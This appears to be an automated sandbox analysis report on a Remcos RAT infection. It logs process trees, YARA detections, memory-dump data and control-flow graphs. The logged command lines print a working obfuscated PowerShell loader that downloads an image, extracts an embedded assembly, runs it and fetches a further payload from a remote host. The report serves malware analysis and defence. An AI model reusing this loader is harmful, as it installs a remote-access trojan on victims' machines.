                                                                                                                                                                                              Imagebase:0x13f780000
                                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                              Start time:09:37:36
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                              Imagebase:0xfa0000
                                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.879514002.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.879261278.0000000000895000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.879514002.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.880062392.0000000000D4E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                              Start time:09:37:39
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
                                                                                                                                                                                              Imagebase:0xff7f0000
                                                                                                                                                                                              File size:168'960 bytes
                                                                                                                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                              Start time:09:37:40
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                              Start time:09:37:40
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm"
                                                                                                                                                                                              Imagebase:0xfa0000
                                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                              Start time:09:37:40
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tkloyslrzegxfpgbpcmonko"
                                                                                                                                                                                              Imagebase:0xfa0000
                                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                              Start time:09:37:41
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\emrhylvlvnykqvcfgfgpxwbgnd"
                                                                                                                                                                                              Imagebase:0xfa0000
                                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                              Start time:09:37:42
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                              Start time:09:37:52
                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                              Imagebase:0xfa0000
                                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.527567335.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Call Graph

                                                                                                                                                                                              • Entrypoint
                                                                                                                                                                                              • Decryption Function
                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              • Show Help
                                                                                                                                                                                              callgraph 1 Error: Graph is empty

                                                                                                                                                                                              Module: Sheet1

                                                                                                                                                                                              Declaration
                                                                                                                                                                                              LineContent
                                                                                                                                                                                              1

                                                                                                                                                                                              Attribute VB_Name = "Sheet1"

                                                                                                                                                                                              2

                                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                              3

                                                                                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                              4

                                                                                                                                                                                              Attribute VB_Creatable = False

                                                                                                                                                                                              5

                                                                                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                                                                                              6

                                                                                                                                                                                              Attribute VB_Exposed = True

                                                                                                                                                                                              7

                                                                                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                                                                                              8

                                                                                                                                                                                              Attribute VB_Customizable = True

                                                                                                                                                                                              Module: Sheet2

                                                                                                                                                                                              Declaration
                                                                                                                                                                                              LineContent
                                                                                                                                                                                              1

                                                                                                                                                                                              Attribute VB_Name = "Sheet2"

                                                                                                                                                                                              2

                                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                              3

                                                                                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                              4

                                                                                                                                                                                              Attribute VB_Creatable = False

                                                                                                                                                                                              5

                                                                                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                                                                                              6

                                                                                                                                                                                              Attribute VB_Exposed = True

                                                                                                                                                                                              7

                                                                                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                                                                                              8

                                                                                                                                                                                              Attribute VB_Customizable = True

                                                                                                                                                                                              Module: Sheet3

                                                                                                                                                                                              Declaration
                                                                                                                                                                                              LineContent
                                                                                                                                                                                              1

                                                                                                                                                                                              Attribute VB_Name = "Sheet3"

                                                                                                                                                                                              2

                                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                              3

                                                                                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                              4

                                                                                                                                                                                              Attribute VB_Creatable = False

                                                                                                                                                                                              5

                                                                                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                                                                                              6

                                                                                                                                                                                              Attribute VB_Exposed = True

                                                                                                                                                                                              7

                                                                                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                                                                                              8

                                                                                                                                                                                              Attribute VB_Customizable = True

                                                                                                                                                                                              Module: ThisWorkbook

                                                                                                                                                                                              Declaration
                                                                                                                                                                                              LineContent
                                                                                                                                                                                              1

                                                                                                                                                                                              Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                                                              2

                                                                                                                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                                              3

                                                                                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                              4

                                                                                                                                                                                              Attribute VB_Creatable = False

                                                                                                                                                                                              5

                                                                                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                                                                                              6

                                                                                                                                                                                              Attribute VB_Exposed = True

                                                                                                                                                                                              7

                                                                                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                                                                                              8

                                                                                                                                                                                              Attribute VB_Customizable = True

                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000003.447256704.0000000003370000.00000010.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_3370000_mshta.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction ID: 77aecc3cca552922da9d1f0df9fe9e40ab9e2dd6ccc454cafd5d770df8255a5f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000003.447256704.0000000003370000.00000010.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_3370000_mshta.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction ID: 77aecc3cca552922da9d1f0df9fe9e40ab9e2dd6ccc454cafd5d770df8255a5f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000003.447256704.0000000003370000.00000010.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_3370000_mshta.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction ID: 77aecc3cca552922da9d1f0df9fe9e40ab9e2dd6ccc454cafd5d770df8255a5f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:4.7%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                execution_graph 3620 7fe89977ae1 3622 7fe89977af1 URLDownloadToFileW 3620->3622 3623 7fe89977c00 3622->3623

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 211 7fe89977018-7fe89977ba1 215 7fe89977bab-7fe89977bb1 211->215 216 7fe89977ba3-7fe89977ba8 211->216 217 7fe89977bbb-7fe89977bfe URLDownloadToFileW 215->217 218 7fe89977bb3-7fe89977bb8 215->218 216->215 219 7fe89977c06-7fe89977c23 217->219 220 7fe89977c00 217->220 218->217 220->219
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482794160.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DownloadFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1407266417-0
                                                                                                                                                                                                • Opcode ID: 4b8140071b0c80aa51b8dff1d51470bcf29192bea14c00e4fa2807e205654760
                                                                                                                                                                                                • Instruction ID: 1d33ba538100256282431abe60b236cf5016890cd92fc2cde5cde3d37c461fed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b8140071b0c80aa51b8dff1d51470bcf29192bea14c00e4fa2807e205654760
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B31913191CA5C9FDB58EF5CD889BA9B7E1FB69321F00822ED04DD3661DB70B8058B81

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482997965.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (Fl$0ct$0ct$0ct$8Fl
                                                                                                                                                                                                • API String ID: 0-2738441168
                                                                                                                                                                                                • Opcode ID: 7c23b35f5da49ae04c691a7ee1ba2565411d19edb80831293b9d5b63373160fe
                                                                                                                                                                                                • Instruction ID: f749e32fc36301906f776c863152242f323fb94449005f03663232a65c1cfee7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c23b35f5da49ae04c691a7ee1ba2565411d19edb80831293b9d5b63373160fe
                                                                                                                                                                                                • Instruction Fuzzy Hash: EDC1243090DBCA4FE74AE73859146BA7FE1EF46748F1901EAD48EC71A3D618AC12C761

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 56 7fe89a48549-7fe89a485f9 57 7fe89a485ff-7fe89a48609 56->57 58 7fe89a48add-7fe89a48b96 56->58 59 7fe89a48622-7fe89a48629 57->59 60 7fe89a4860b-7fe89a48618 57->60 61 7fe89a48640 59->61 62 7fe89a4862b-7fe89a4863e 59->62 60->59 64 7fe89a4861a-7fe89a48620 60->64 65 7fe89a48642-7fe89a48644 61->65 62->65 64->59 66 7fe89a4864a-7fe89a48656 65->66 67 7fe89a48a58-7fe89a48a62 65->67 66->58 70 7fe89a4865c-7fe89a48666 66->70 71 7fe89a48a75-7fe89a48a85 67->71 72 7fe89a48a64-7fe89a48a74 67->72 75 7fe89a48682-7fe89a48692 70->75 76 7fe89a48668-7fe89a48675 70->76 73 7fe89a48a92-7fe89a48adc 71->73 74 7fe89a48a87-7fe89a48a8b 71->74 74->73 75->67 83 7fe89a48698-7fe89a486cc 75->83 76->75 78 7fe89a48677-7fe89a48680 76->78 78->75 83->67 88 7fe89a486d2-7fe89a486de 83->88 88->58 89 7fe89a486e4-7fe89a486ee 88->89 90 7fe89a486f0-7fe89a486fd 89->90 91 7fe89a48707-7fe89a4870c 89->91 90->91 92 7fe89a486ff-7fe89a48705 90->92 91->67 93 7fe89a48712-7fe89a48717 91->93 92->91 93->67 94 7fe89a4871d-7fe89a48722 93->94 94->67 96 7fe89a48728-7fe89a48737 94->96 97 7fe89a48747 96->97 98 7fe89a48739-7fe89a48743 96->98 101 7fe89a4874c-7fe89a48759 97->101 99 7fe89a48763-7fe89a487ee 98->99 100 7fe89a48745 98->100 108 7fe89a48802-7fe89a48824 99->108 109 7fe89a487f0-7fe89a487fb 99->109 100->101 101->99 102 7fe89a4875b-7fe89a48761 101->102 102->99 110 7fe89a48834 108->110 111 7fe89a48826-7fe89a48830 108->111 109->108 114 7fe89a48839-7fe89a48846 110->114 112 7fe89a48832 111->112 113 7fe89a48850-7fe89a488de 111->113 112->114 121 7fe89a488f2-7fe89a48910 113->121 122 7fe89a488e0-7fe89a488eb 113->122 114->113 115 7fe89a48848-7fe89a4884e 114->115 115->113 123 7fe89a48912-7fe89a4891c 121->123 124 7fe89a48920 121->124 122->121 125 7fe89a4891e 123->125 126 7fe89a4893d-7fe89a489cd 123->126 127 7fe89a48925-7fe89a48933 124->127 125->127 134 7fe89a489cf-7fe89a489da 126->134 135 7fe89a489e1-7fe89a48a3a 126->135 127->126 128 7fe89a48935-7fe89a4893b 127->128 128->126 134->135 138 7fe89a48a42-7fe89a48a57 135->138
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482997965.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0ct$8=t
                                                                                                                                                                                                • API String ID: 0-536450954
                                                                                                                                                                                                • Opcode ID: 04e6b11bc997d3a2c5654e27024801ce8c500171e25cc04d48a5b4e9933d8e7d
                                                                                                                                                                                                • Instruction ID: 1fd9f7b918998eeed6f9b1fc9c3185bcff300a26f0fe4bdacc21e8ae7f93299f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e6b11bc997d3a2c5654e27024801ce8c500171e25cc04d48a5b4e9933d8e7d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2422F63090CB894FD79ADB2C94646697BE2FF9A344F2400EED48EC72A3DA24AC55C751

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 139 7fe89a4566d-7fe89a45677 140 7fe89a4567e-7fe89a4568f 139->140 141 7fe89a45679 139->141 143 7fe89a45691 140->143 144 7fe89a45696-7fe89a456a7 140->144 141->140 142 7fe89a4567b 141->142 142->140 143->144 145 7fe89a45693 143->145 146 7fe89a456ae-7fe89a456bf 144->146 147 7fe89a456a9 144->147 145->144 149 7fe89a456c1 146->149 150 7fe89a456c6-7fe89a456d7 146->150 147->146 148 7fe89a456ab 147->148 148->146 149->150 151 7fe89a456c3 149->151 152 7fe89a456de-7fe89a456f9 150->152 153 7fe89a456d9 150->153 151->150 155 7fe89a45774-7fe89a45777 152->155 156 7fe89a456fb-7fe89a45720 152->156 153->152 154 7fe89a456db 153->154 154->152 158 7fe89a45778-7fe89a4579a 155->158 157 7fe89a45722-7fe89a45773 156->157 156->158 157->155 159 7fe89a45903-7fe89a459cc 158->159 160 7fe89a457a0-7fe89a457aa 158->160 161 7fe89a457c3-7fe89a457c8 160->161 162 7fe89a457ac-7fe89a457b9 160->162 165 7fe89a458a3-7fe89a458ad 161->165 166 7fe89a457ce-7fe89a457d1 161->166 162->161 164 7fe89a457bb-7fe89a457c1 162->164 164->161 169 7fe89a458af-7fe89a458bd 165->169 170 7fe89a458be-7fe89a458ce 165->170 167 7fe89a457d3-7fe89a457e2 166->167 168 7fe89a45816 166->168 167->159 178 7fe89a457e8-7fe89a457f2 167->178 172 7fe89a45818-7fe89a4581a 168->172 173 7fe89a458d0-7fe89a458d4 170->173 174 7fe89a458db-7fe89a45900 170->174 172->165 177 7fe89a45820-7fe89a45826 172->177 173->174 174->159 180 7fe89a45842-7fe89a45884 177->180 181 7fe89a45828-7fe89a45835 177->181 183 7fe89a457f4-7fe89a45801 178->183 184 7fe89a4580b-7fe89a45814 178->184 193 7fe89a4588a-7fe89a458a2 180->193 181->180 185 7fe89a45837-7fe89a45840 181->185 183->184 187 7fe89a45803-7fe89a45809 183->187 184->172 185->180 187->184
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.482997965.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0ct$V
